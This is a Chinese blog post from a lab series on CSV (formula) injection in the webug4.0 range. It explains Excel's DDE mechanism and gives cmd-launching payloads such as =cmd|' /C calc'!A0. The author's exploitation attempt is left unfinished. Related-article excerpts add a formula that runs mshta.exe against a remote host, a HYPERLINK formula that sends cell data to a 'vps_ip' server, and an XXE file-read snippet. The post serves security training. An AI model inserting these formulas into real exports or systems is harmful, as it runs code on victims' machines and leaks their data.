webug4.0-csv注入

最新推荐文章于 2024-07-26 14:49:04 发布
最新推荐文章于 2024-07-26 14:49:04 发布
阅读量1k 收藏
点赞数
分类专栏: 靶场练习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nex1less/article/details/100009157
版权

0x01

1.什么是csv注入?

攻击包含向恶意的EXCEL公式中注入可以输出或以CSV文件读取的参数。当在Excel中打开CSV文件时,文件会从CSV描述转变为原始的Excel格式,包括Excel提供的所有动态功能。在这个过程中,CSV中的所有Excel公式都会执行。当该函数有合法意图时,很易被滥用并允许恶意代码执行。 原文回答借鉴:https://www.freebuf.com/vuls/195656.html

2.csv注入的原理是怎样的?

当你输入一个公式,会被Excel自动运算并执行:

而当你输入一个别的Excel本身不会存在的功能时,Excel就会被微软的另一种机制:DDE机制调用。

3.什么是DDE?

DDE是一种动态数据交换机制(Dynamic Data Exchange,DDE)。使用DDE通讯需要两个Windows应用程序,其中一个作为服务器处理信息,另外一个作为客户机从服务器获得信息。客户机应用程序向当前所激活的服务器应用程序发送一条消息请求信息,服务器应用程序根据该信息作出应答,从而实现两个程序之间的数据交换。详细请点这。

4.既然这么危险能举个例子吗

请输入  =cmd|' /C calc'!A0   (现在的excel依然可以,不过会有弹出框提醒)

 点击是 会调用计算器

查看ip地址: =cmd|' /k ipconfig' !A0

5.漏洞常见地点在哪?

留言板,问卷调查等用到Excel表的地方

相关的漏洞问题:https://hackerone.com/reports/111192

0x02 漏洞利用

1.失败的漏洞利用

 2.查看源码

发现可能是数据库密码写错了,所以查不出来数据

3.我们将mysql改为root 刷新之后再次查看:

发现表格是显示了但是导出按钮还是导不出来

4.我们接着查看源代码

发现两行关键代码:

于是我们搜索table-to-excel.js

发现没有结果 需要自己创建文件夹 以及.js文件(现在没时间,等以后可能我会再修复),或者直接自己写JavaScript代码 内部调用即可(就是把html表格导出成excel)

0x03 结语

                                                                          此次可能是我最失败的一节了。。

nex1less
关注
专栏目录
【C++】开源:fast-cpp-csv-parser数据解析库配置使用
DevFrank的博客
12-26 2227
fast-cpp-csv-parser数据解析库配置使用
Webug(csv注入
weixin_40646615的博客
02-23 719
文章目录Webbug(csv注入CSV注入原理源代码漏洞利用总结 Webbug(csv注入CSV是(逗号分隔值)的英文缩写,通常都是纯文本文件。EXCEL表就可以存为CSV格式,可以用写字板之类工具打开。 CSV注入原理 创建一个CSV格式文件,使用Excel打开,当你输入一个公式,会被Excel自动运算并执行: eg:输入 =3+1,显示自动运算结果 而当你输入一个Excel本身不会存在的功能时,Excel就会被微软的另一种机制:DDE机制调用。 eg:输入 =cmd|’ /C calc’!.
[译]CSV 注入:被人低估的巨大风险
weixin_34198453的博客
10-22 294
原文地址:The Absurdly Underestimated Dangers of CSV Injection 原文作者:georgemauer 译文出自:掘金翻译计划 本文永久链接:github.com/xitu/gold-m… 译者:mnikn 校对者:yct21,CACppuccino 本文讲的是CSV 注入:被人低估的巨大...
漏洞扫描工具大全,零基础入门挖漏洞必知必会
最新发布
jennycisp的博客
07-26 1768
这是一种秘密的扫描方式之一,因为在SYN扫描中Client端和Server端没有形成3次握手,所以没有建立一个正常的TCP连接,因此不被防火墙和日志所记录,一般不会再目标主机上留下任何的痕迹,但是这种扫描是需要root权限(对于windows用户来说,是没有root权限这个概念的,root权限是linux的最高权限,对应windows的管理员权限)网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
Webug4.0-链接注入 CSV注入
baynk的博客
11-27 843
0x00 前言 这两个东西,原来都没怎么注意过名称,又扩展了一些新的知识,不过两篇都没有特别好的去研究,仅当作一次学习记录,以后肯定还会再碰到的。 0x01 链接注入 先看靶场,这么一个链接 这妹纸笑的不错,就是。。。然后换了些参数都没什么变化,但是有一个细节要注意。 不管输入什么这里都会显示出来,于是构造了xss,果然弹框了。感觉和csrf一起使用还是可以的,或者当攻击的跳板平台也是可以的...
CSV注入
内心不种满鲜花就会长满杂草
04-25 5002
一.概述 现在很多应用提供了导出电子表格的功能(不限于 Web 应用),早在 2014 年 8月 29 日国外 James Kettle 便发表了《Comma Separated Vulnerabilities》文章来讲述导出表格的功能可能会导致注入命令的风险,因为导出的表格数据有很多是来自于用户控制的,如:投票应用、邮箱导出。攻击方式类似于 XSS :所有的输入都是不可信的。 我们知道在 Excel 中是可以运行计算公式的:=1+5,它会将以 = 开头的单元格内容解释成公式并运行,单纯的运行...
Webug4.0靶场通关笔记(第四天)--------xxe注入csv注入
Yasso的博客
02-22 837
一、xxe注入 这道题应该是最简单的任意文件读取 打开是一个输入框 在C盘构造一个flag,别问我为啥,我也不知道。。。 bp抓个包 随便输入个什么都有回显,应该是基础的XXE注入 这是一段读取文件的xml<?xml version="1.0"?> <!DOCTYPE ANY [ <!ENTITY B SYSTEM "file:///c:/1.txt"> ]> <xml> <xxe>&B;</xxe&g...
带有示例的PowerShell Export-CSV命令教程
cunjiu9486的博客
10-13 4537
Command-separated Value or CSV files are a very popular type of text files which are used for different purposes. What makes CSV special is the ability to store structured data by delimiting the value...
TMS Component Pack v8.3.4.0 - Delphi 10.1 Berlin Full Source
10-10
- Improved : AppendToCSV() can export to CSV also when no previous CSV exists - Fixed : Issue with FilterDropDownCheck = true and filter strings with spaces - Fixed : CellProperty property name for...
csv注入文件
HoAd'blog
08-06 627
攻击者通过在CSV文件中构造恶意的命令或函数,使得正常用户在使用Excel打开这个CSV文件后恶意的命令或函数被执行,从而造成攻击行为。 原因 1、CSV文件中的几个特殊符号“+、-、@、=” 尝试在CSV单元格中输入“=1+1”,回车后,发现单元格的值变成了2,说明加号被当做运算执行了。 除了加号,“-”、“@”、“=”也会被解释为公式。 2、DDE(Dynamic Data Exchange) DDE是Windows下进程间通信协议,是一种动态数据交换机制,使用DDE通讯需要两个Windows应用程序,
CSV Injection (CSV 注入攻击)
cwxbox
01-28 1243
CSV注入,也称为公式注入,发生在网站在CSV文件中嵌入不可信输入时。当使用电子表格程序(如Microsoft Excel或LibreOffice Calc)打开CSV时,所有以=开头的单元格都会被软件解释为一个公式。
webug4.0——注入
A_dmin的博客
09-09 2674
webug4.0——注入篇 今天接触到一个好玩的靶场环境~~ webug 就去下载安装玩了一下,网盘速度是真的慢,下载下一个下午!!! 附上下载链接:(内附安装教程) 链接: https://pan.baidu.com/s/1WlKzFXsNkfkzzCUR_PYtfA 提取码: jcaa 装好环境,在本地打开,界面还是不错的~ 直接开耍!!! 第一关看题目意思就知道是注入,还是报错注...
应用安全系列之十:CSV注入
jimmyleeee的专栏
03-03 4898
本系列文章主旨在于介绍一些漏洞类型产生的基本原理,探索最基础的解决问题的措施,不排除有些语言或者系统提供的安全的API可以更好地更直接地解决问题,也不排除可以严格地输入验证来解决。 关于CSV注入,可能平时关注的人比较少,不过,只要有以csv文件格式导出数据,它就可能存在。很多系统都会导出csv,将数据用于分析。 首先介绍一下CSV的含义,CSV就是comma-separated-values,就是使用逗号分开的一串值,当使用excel打开时,逗号隔开的内容会被展开为对应行和列的一个cell的值。 ..
webug 4.0 第十四关 链接注入
ONS_cukuyo的博客
04-22 937
感谢webug团队一直以来的更新维护! webug是什么 WeBug名称定义为“我们的漏洞”靶场环境基础环境是基于PHP/mysql制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。部分漏洞是基于Windows操作系统的漏洞所以将WeBug的web环境都装在了一个纯净版的Windows 2003的虚拟机中。 Webug官网:http://www.webug.org...
安全测试 csv 注入
weixin_46202430的博客
03-09 394
csv 注入 用户下单时,收货人姓名为 =cmd|A1!A1 ,下单后 在订单系统可导出订单到csv , 则=cmd|A1!A1 则在csv 的收货人列中的某单元格中, 是可以触发打开cmd 的,黑客是可以通过cmd 做一些危险操作,比如: =+1+cmd|’/c mshta.exehttp://192.168.233.102:8080/a’!A0 =HYPERLINK(“http://vps_ip?test=”&A2&A3,“Error: Please click me!”) 这.
csv注入初探以及利用
Cwh的个人博客
02-28 3420
简介 之前进行渗透的时候经常会碰见csv,excel导入的功能。也思考过潜在安全隐患,今天刚好看到fb里面的一篇文章,fb上的介绍并不详细,对于其中的利用方式很感兴趣,基于此进行了一番学习。 fb链接 https://www.freebuf.com/vuls/195656.html 漏洞介绍 CSV公式注入(CSV Injection)是一种会造成巨大影响的攻击向量。攻击包含向恶意的EXCEL公...
json-to-csv stream
10-04
json-to-csv stream是一种用于将JSON数据流转换成CSV格式的工具。JSON是一种常用的数据交换格式,而CSV则是一种简单的表格数据格式。使用json-to-csv stream可以方便地将JSON数据转换成CSV格式,以便于更容易地进行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值